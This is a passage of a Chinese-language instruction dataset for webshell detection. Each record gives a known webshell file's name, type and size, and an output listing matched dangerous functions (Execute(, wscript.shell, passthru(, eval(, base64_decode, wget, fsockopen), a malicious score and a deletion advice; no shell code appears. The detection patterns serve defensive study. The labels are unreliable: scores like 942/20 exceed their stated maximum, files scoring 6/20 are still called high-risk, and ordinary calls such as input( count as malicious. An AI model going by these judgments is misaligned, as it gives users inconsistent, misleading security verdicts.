\"不灭之魂.asp\", \"文件类型\": \"asp\", \"文件大小\": \"98533 bytes\", \"行数\": 1355}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Execute(, wscript.shell, execute(, Cmd.exe, CreateObject( 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 336/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/asp/不灭之魂.asp", "malicious_score": 336, "md5_hash": "3bea9c85adf09796f5a72aa3c55fea2e"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2013110125027897.asp\", \"文件类型\": \"asp\", \"文件大小\": \"91690 bytes\", \"行数\": 1266}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, Execute(, wscript.shell, execute(, CreateObject( 发现混淆技术: chr\\s*\\( 恶意度评分: 176/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/asp/2013110125027897.asp", "malicious_score": 176, "md5_hash": "13ac4146e4a34e3cb984951ac4ab7701"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"grasp.asp\", \"文件类型\": \"asp\", \"文件大小\": \"43545 bytes\", \"行数\": 1156}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, WSCRIPT.SHELL, CreateObject( 发现混淆技术: ord\\s*\\(, chr\\s*\\( 恶意度评分: 139/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/asp/grasp.asp", "malicious_score": 139, "md5_hash": "dae3f60bc0944c1aaace48a54c6ad31b"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Cmd支持管理员登陆的webshell.asp\", \"文件类型\": \"asp\", \"文件大小\": \"41049 bytes\", \"行数\": 1715}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Execute(, request.queryString, CreateObject(, request.Form, request.form 发现混淆技术: chr\\s*\\( 恶意度评分: 26/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/asp/Cmd支持管理员登陆的webshell.asp", "malicious_score": 26, "md5_hash": "d10459657a270236a2a8450f1374b69e"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"vps提权马.asp\", \"文件类型\": \"asp\", \"文件大小\": \"88563 bytes\", \"行数\": 1295}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: REquEst.form, createobject(, Execute(, wscript.shell, REsPonsE.WritE 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 768/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/asp/vps提权马.asp", "malicious_score": 768, "md5_hash": "259fd18ddcef473bf0a0145279eb468f"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ajn.asp\", \"文件类型\": \"asp\", \"文件大小\": \"1228 bytes\", \"行数\": 30}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: WScript.Shell, CreateObject( 恶意度评分: 21/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/asp/ajn.asp", "malicious_score": 21, "md5_hash": "aaafafc5d286f0bff827a931f6378d04"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"shell_decoded.asp\", \"文件类型\": \"asp\", \"文件大小\": \"136109 bytes\", \"行数\": 2198}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, Execute(, wscript.shell, CreateObject(, request.form 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 942/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/asp/ajs/shell_decoded.asp", "malicious_score": 942, "md5_hash": "f2d2694eab72bfc59b7d714a81b2f4c8"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"明文版.asp\", \"文件类型\": \"asp\", \"文件大小\": \"94857 bytes\", \"行数\": 2996}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, Execute(, request.queryString, execute(, request.Form 发现混淆技术: chr\\s*\\( 恶意度评分: 80/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/asp/RadHat-webshell-del-backdoor/明文版.asp", "malicious_score": 80, "md5_hash": "bec92b1096273649ef8e936428080824"}} {"instruction": "分析这个python文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"server.py\", \"文件类型\": \"python\", \"文件大小\": \"1737 bytes\", \"行数\": 60}", "output": "这是一个python类型的webshell文件。 检测到恶意函数: input(, raw_input( 发现混淆技术: ord\\s*\\( 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_python_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/SSH/custom-ssh-backdoor/server.py", "malicious_score": 8, "md5_hash": "116432c91829d4856d5ef0a0d23e46b7"}} {"instruction": "分析这个python文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"revsshserver.py\", \"文件类型\": \"python\", \"文件大小\": \"1745 bytes\", \"行数\": 60}", "output": "这是一个python类型的webshell文件。 检测到恶意函数: input(, raw_input( 发现混淆技术: ord\\s*\\( 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_python_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/SSH/ReverseSSH-Backdoor/revsshserver.py", "malicious_score": 8, "md5_hash": "a7272d41736d5cd7a537ff9d05e1bdf9"}} {"instruction": "分析这个perl文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"devilzShell.cgi\", \"文件类型\": \"perl\", \"文件大小\": \"50929 bytes\", \"行数\": 1429}", "output": "这是一个perl类型的webshell文件。 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, ord\\s*\\( 具备文件操作能力: mkdir\\s*\\(, unlink\\s*\\( 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_perl_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Cgi/devilzShell.cgi", "malicious_score": 8, "md5_hash": "5ad6a3da93330359cb1292e9d289b7cc"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"xslt.php\", \"文件类型\": \"php\", \"文件大小\": \"553 bytes\", \"行数\": 15}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: assert(, $_POST[ 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/xml/xml/xslt.php", "malicious_score": 6, "md5_hash": "01a539413ec121a198a9412be7c415dd"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"xslt.asp\", \"文件类型\": \"asp\", \"文件大小\": \"781 bytes\", \"行数\": 9}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, response.write, CreateObject( 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/xml/xml/xslt.asp", "malicious_score": 12, "md5_hash": "e1dc94cf1cd2b3f9f51405c5060c412d"}} {"instruction": "分析这个python文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"shellcode_generate.py\", \"文件类型\": \"python\", \"文件大小\": \"958 bytes\", \"行数\": 22}", "output": "这是一个python类型的webshell文件。 检测到恶意函数: subprocess. 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_python_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/gdog/shellcode_generate.py", "malicious_score": 6, "md5_hash": "b18779c97554ae4ce41a4d296ff49e42"}} {"instruction": "分析这个python文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"client.py\", \"文件类型\": \"python\", \"文件大小\": \"39087 bytes\", \"行数\": 1121}", "output": "这是一个python类型的webshell文件。 检测到恶意函数: subprocess. 发现混淆技术: pack\\s*\\(, ord\\s*\\(, chr\\s*\\( 包含网络功能: urllib 恶意度评分: 28/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_python_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/gdog/client.py", "malicious_score": 28, "md5_hash": "74b1c8d2bc227a3307892b53e1493169"}} {"instruction": "分析这个python文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"pyspy.py\", \"文件类型\": \"python\", \"文件大小\": \"18487 bytes\", \"行数\": 527}", "output": "这是一个python类型的webshell文件。 检测到恶意函数: eval(, subprocess. 发现混淆技术: chr\\s*\\( 恶意度评分: 17/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_python_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/python/pyspy.py", "malicious_score": 17, "md5_hash": "600c642aeb6b01c2999cf6c85025fc1b"}} {"instruction": "分析这个python文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wh_bindshell.py\", \"文件类型\": \"python\", \"文件大小\": \"3021 bytes\", \"行数\": 86}", "output": "这是一个python类型的webshell文件。 检测到恶意函数: os.popen( 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_python_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/python/wh_bindshell.py", "malicious_score": 12, "md5_hash": "fab20902862736e24aaae275af5e049c"}} {"instruction": "分析这个python文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"webllehs.py\", \"文件类型\": \"python\", \"文件大小\": \"19388 bytes\", \"行数\": 534}", "output": "这是一个python类型的webshell文件。 检测到恶意函数: eval(, os.popen( 包含网络功能: urllib 具备文件操作能力: mkdir\\s*\\(, unlink\\s*\\( 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_python_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/python/webllehs.py", "malicious_score": 12, "md5_hash": "086add5e47cd12c26751353aa95b73b9"}} {"instruction": "分析这个python文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Server.py\", \"文件类型\": \"python\", \"文件大小\": \"8063 bytes\", \"行数\": 220}", "output": "这是一个python类型的webshell文件。 检测到恶意函数: input( 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_python_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/python/python3/Server.py", "malicious_score": 9, "md5_hash": "f86efc577c10b42d65e8eef6375f8dcb"}} {"instruction": "分析这个python文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Client.py\", \"文件类型\": \"python\", \"文件大小\": \"2243 bytes\", \"行数\": 77}", "output": "这是一个python类型的webshell文件。 检测到恶意函数: subprocess. 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_python_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/python/python3/Client.py", "malicious_score": 12, "md5_hash": "4127510b6bbd12e76bfce157875e3693"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"safe0ver.php\", \"文件类型\": \"php\", \"文件大小\": \"39253 bytes\", \"行数\": 934}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[, exec(, system(, passthru( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 32/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/safe0ver.php", "malicious_score": 32, "md5_hash": "b01772c349603548e771615cacc3cd51"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"pas.php\", \"文件类型\": \"php\", \"文件大小\": \"21194 bytes\", \"行数\": 257}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_COOKIE[, gzinflate(, create_function( 发现混淆技术: gzinflate, ord\\s*\\(, chr\\s*\\( 恶意度评分: 21/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/pas.php", "malicious_score": 21, "md5_hash": "7a77f02b305d6c09633499dcaa0312ca"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Antichat Socks5 Server v 1.0.php\", \"文件类型\": \"php\", \"文件大小\": \"15272 bytes\", \"行数\": 485}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fputs( 发现混淆技术: pack\\s*\\(, ord\\s*\\(, chr\\s*\\( 包含网络功能: socket_create 具备文件操作能力: fopen\\s*\\( 恶意度评分: 11/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Antichat Socks5 Server v 1.0.php", "malicious_score": 11, "md5_hash": "06bf3102ec2acfcb56e2cace2526daeb"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"gfs_sh.php\", \"文件类型\": \"php\", \"文件大小\": \"64548 bytes\", \"行数\": 1575}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, fputs(, exec(, $_POST[, system( 发现混淆技术: base64_decode 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 510/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/gfs_sh.php", "malicious_score": 510, "md5_hash": "3e471100df9c0da9e4ceee81a388c747"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"PHP小马 - ExpDoor.com.php\", \"文件类型\": \"php\", \"文件大小\": \"439 bytes\", \"行数\": 18}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[ 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 11/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/PHP小马 - ExpDoor.com.php", "malicious_score": 11, "md5_hash": "a524e7ae8d71e37d2fd3e5fbdab405ea"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"aZRaiLPhp v1.0.php\", \"文件类型\": \"php\", \"文件大小\": \"10705 bytes\", \"行数\": 284}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: passthru(, $_POST[, fwrite( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 17/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/aZRaiLPhp v1.0.php", "malicious_score": 17, "md5_hash": "209eabe5bace5398ae84d86e31e1a94b"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"KA_uShell 0.1.6.php\", \"文件类型\": \"php\", \"文件大小\": \"4656 bytes\", \"行数\": 229}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, $_POST[, fputs(, eval(, passthru( 发现混淆技术: base64_decode 包含网络功能: fsockopen 具备文件操作能力: copy\\s*\\( 恶意度评分: 82/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/KA_uShell 0.1.6.php", "malicious_score": 82, "md5_hash": "3529a116017ece53288e66e96e6a4892"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"AK-74 Security Team.php\", \"文件类型\": \"php\", \"文件大小\": \"19593 bytes\", \"行数\": 640}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_POST[, eval(, passthru( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 150/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/AK-74 Security Team.php", "malicious_score": 150, "md5_hash": "a9b712eee2ee5538f10d9e35060b325a"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"SimShell 1.0 - Simorgh Security MGZ.php\", \"文件类型\": \"php\", \"文件大小\": \"5164 bytes\", \"行数\": 180}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[ 恶意度评分: 48/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/SimShell 1.0 - Simorgh Security MGZ.php", "malicious_score": 48, "md5_hash": "37cb1db26b1b0161a4bf678a6b4565bd"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"simattacker.php\", \"文件类型\": \"php\", \"文件大小\": \"12745 bytes\", \"行数\": 754}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: shell_exec(, $_GET[, $_POST[, exec(, passthru( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, move_uploaded_file, unlink\\s*\\( 恶意度评分: 77/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/simattacker.php", "malicious_score": 77, "md5_hash": "ca5ea9f6d07dcbbca8843e488991564f"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"toby57解析加密一句话木马.php\", \"文件类型\": \"php\", \"文件大小\": \"849 bytes\", \"行数\": 30}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, eval(, fwrite( 包含网络功能: fsockopen 具备文件操作能力: file_put_contents, fwrite\\s*\\( 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/toby57解析加密一句话木马.php", "malicious_score": 12, "md5_hash": "b83d76e4d24249f1adda5502a2799b21"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"dC3 Security Crew Shell PRiV.php\", \"文件类型\": \"php\", \"文件大小\": \"44666 bytes\", \"行数\": 1273}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, $_GET[, fwrite(, $_POST[, exec( 发现混淆技术: base64_decode 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 350/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/dC3 Security Crew Shell PRiV.php", "malicious_score": 350, "md5_hash": "433706fdc539238803fd47c4394b5109"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"SST Sheller.php\", \"文件类型\": \"php\", \"文件大小\": \"21397 bytes\", \"行数\": 907}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, file_get_contents(, fwrite(, system(, $_POST[ 具备文件操作能力: fopen\\s*\\(, move_uploaded_file, unlink\\s*\\( 恶意度评分: 124/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/SST Sheller.php", "malicious_score": 124, "md5_hash": "d93c62a0a042252f7531d8632511ca56"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"CrystalShell v.1.php\", \"文件类型\": \"php\", \"文件大小\": \"41610 bytes\", \"行数\": 929}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, fputs(, exec(, $_POST[ 发现混淆技术: chr\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, copy\\s*\\( 恶意度评分: 188/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/CrystalShell v.1.php", "malicious_score": 188, "md5_hash": "0049f8ad598753cd6de56e444e9c068f"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"aZRaiLPhp_v1.0.php\", \"文件类型\": \"php\", \"文件大小\": \"10705 bytes\", \"行数\": 284}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: passthru(, $_POST[, fwrite( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 17/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/aZRaiLPhp_v1.0.php", "malicious_score": 17, "md5_hash": "209eabe5bace5398ae84d86e31e1a94b"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Ajax_PHP Command Shell.php\", \"文件类型\": \"php\", \"文件大小\": \"17536 bytes\", \"行数\": 646}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_POST[, exec(, system( 具备文件操作能力: fopen\\s*\\(, move_uploaded_file, unlink\\s*\\( 恶意度评分: 55/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Ajax_PHP Command Shell.php", "malicious_score": 55, "md5_hash": "93d1a2e13a3368a2472043bd6331afe9"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"c99_madnet.php\", \"文件类型\": \"php\", \"文件大小\": \"44358 bytes\", \"行数\": 7}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/c99_madnet.php", "malicious_score": 13, "md5_hash": "0e2bcce5189a5c8de2785977e83aa413"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"small.php\", \"文件类型\": \"php\", \"文件大小\": \"15912 bytes\", \"行数\": 502}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[, eval( 具备文件操作能力: fopen\\s*\\(, copy\\s*\\(, fwrite\\s*\\( 恶意度评分: 144/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/small.php", "malicious_score": 144, "md5_hash": "2c57bae30117b7f5c390c6c2b53dcf79"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Backup script on server.php\", \"文件类型\": \"php\", \"文件大小\": \"6331 bytes\", \"行数\": 170}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, shell_exec(, exec( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 14/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Backup script on server.php", "malicious_score": 14, "md5_hash": "ab1a06ab1a1fe94e3f3b7f80eedbc12f"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"www.zjjv.com.php\", \"文件类型\": \"php\", \"文件大小\": \"76050 bytes\", \"行数\": 1465}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/www.zjjv.com.php", "malicious_score": 13, "md5_hash": "e910398aac92f5c5a70fb49dfaec3501"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"r57shell.php\", \"文件类型\": \"php\", \"文件大小\": \"18247 bytes\", \"行数\": 583}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, fwrite(, exec(, system(, $_POST[ 具备文件操作能力: fopen\\s*\\(, move_uploaded_file, unlink\\s*\\( 恶意度评分: 139/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/r57shell.php", "malicious_score": 139, "md5_hash": "bdd808475d90403907de99e2d5c3b793"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"scanner.php\", \"文件类型\": \"php\", \"文件大小\": \"3388 bytes\", \"行数\": 137}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, file_get_contents(, $_REQUEST[, exec( 包含网络功能: fsockopen, curl_exec 恶意度评分: 38/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/scanner.php", "malicious_score": 38, "md5_hash": "209e8fc2acb089f610a1068129a490c1"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Private x0rg Web Hosting Bypass.php\", \"文件类型\": \"php\", \"文件大小\": \"216537 bytes\", \"行数\": 5}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, base64_decode( 发现混淆技术: base64_decode 包含网络功能: wget 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Private x0rg Web Hosting Bypass.php", "malicious_score": 9, "md5_hash": "b84b706524c2b101ecc73f790c52f114"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"pHpINJ.php\", \"文件类型\": \"php\", \"文件大小\": \"1160 bytes\", \"行数\": 37}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, system(, $_GET[ 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/pHpINJ.php", "malicious_score": 15, "md5_hash": "d7a4b0df45d34888d5a09f745e85733f"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Matamu Mat.php\", \"文件类型\": \"php\", \"文件大小\": \"3801 bytes\", \"行数\": 146}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: system(, exec( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Matamu Mat.php", "malicious_score": 6, "md5_hash": "1a95f0163b6dea771da1694de13a3d8d"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"bdshell.php\", \"文件类型\": \"php\", \"文件大小\": \"2873 bytes\", \"行数\": 67}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: passthru(, $_POST[, file_get_contents( 具备文件操作能力: unlink\\s*\\( 恶意度评分: 34/20 建议: 